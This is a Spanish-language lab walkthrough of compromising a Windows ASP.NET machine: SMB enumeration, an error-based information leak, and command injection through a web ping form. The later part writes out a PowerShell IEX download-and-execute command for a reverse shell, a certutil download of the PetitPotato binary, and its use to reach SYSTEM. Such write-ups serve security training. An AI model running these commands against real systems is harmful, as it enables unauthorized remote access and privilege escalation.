Maquina Windows (ASP.NET)
Se logra identificar el servicio SMB, RDP y HTTP.
Acceso a Recursos Compartidos:
Para descargar podriamos utilizar algo similar a:
smb: \> get backup.json
La pagina contiene:
Como sabemos que este sitio web trabaja con ASP, le enviamos un descubrimiento de archivos con la extension de ASPX utilizando el parámetro:
Se lograron detectar dos ficheros con extensión .aspx.
Asà que lo ideal seria revisar cada uno de estos ficheros desde en el navegador web.
El primero archivo nos entrega una divulgación de información sensible por medio de un manejo inadecuado de errores.
Este error se provoca debido a un intento fallido de conexión con una base de datos de SQLSERVER.
Ahora ingresamos al directorio test:
Inyección de comandos en formulario web
La inyección de comandos en aplicativos web es una vulnerabilidad crÃtica que ocurre cuando una aplicación web permite que un atacante inyecte y ejecute comandos arbitrarios en el sistema operativo subyacente. Este tipo de ataque surge debido a una insuficiente validación o sanitización de los datos que la aplicación recibe, permitiendo que los usuarios maliciosos inyecten comandos del sistema operativo (OS) a través de formularios, URLs o cualquier punto de entrada de datos. Este tipo de vulnerabilidad se encuentra principalmente en aplicaciones web que ejecutan comandos del sistema como parte de su funcionalidad, ya sea para interactuar con archivos, servicios del sistema o realizar tareas administrativas.
¿Cómo surge una inyección de comandos?
Una inyección de comandos ocurre cuando la aplicación web toma los datos proporcionados por el usuario (inputs) y los pasa directamente a un intérprete de comandos del sistema operativo sin realizar una sanitización adecuada o sin implementar medidas de seguridad como el uso de funciones especÃficas que eviten la ejecución directa de comandos arbitrarios. Este problema generalmente surge en aplicaciones que interactúan con el sistema operativo a través de funciones como system(), exec(), popen(), o equivalentes en otros lenguajes de programación.
Vamos a snifear el trafico ICMP con TCPDUMP desde el servidor de WordPress y enviamos el ping desde el portal de ASPX hacia la ip privada del equipo de WordPress:
En la evidencia previa, se puede apreciar la recepción exitosa del trafico ICMP desde la IP 172.16.1.10 hacia la IP 172.16.1.12
En las auditorias webs, siempre es recomendable revisar el código fuente de la aplicación web:
El Código fuente de la aplicación es el siguiente:
Vamos a intentar realizar una inyección de comandos sobre el servidor por medio del carácter especial: &
Logramos apreciar que esta aplicación es vulnerable a la inyección de comandos por medio del &
En este punto podemos ejecutar varios comandos para enumerar el sistema afectado:
Migracion de WebShell hacia RevShell utilizando PowerShell
Los APT suelen almacenar sus reverse Shell o virus en plataformas digitales clasificadas como seguras y de esta manera evitar la detección por parte de los blue team; ya que el tráfico saliente estarÃa apuntando hacia recursos conocidos como confiables.
Y posteriormente, ejecutamos el siguiente comando sobre el formulario web vulnerable:
&powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://172.16.1.12/wordpress/PowerCPPJ.ps1')"
Antes de la ejecución, vamos a iniciar una escucha con Netcat teniendo en cuenta lo alojado en la Shell inversa que se encuentra en GitHub.
Ya entramos al windows....
Escalacion de privilegios en Windows usando SeImpersonatePrivilege
whoami /priv
Utilizamos LOLBAS para descargar el siguiente binario:
certutil -urlcache -f https://github.com/wh0amitz/PetitPotato/releases/download/v1.0.0/PetitPotato.exe C:\Users\Public\PetitPotato.exe
Y luego ejecutamos el siguiente comando:
C:\Users\Public\PetitPotato.exe 3 "whoami"
El retorno de este comando sera igual a:
NT AUTHORITY\SYSTEM
Last updated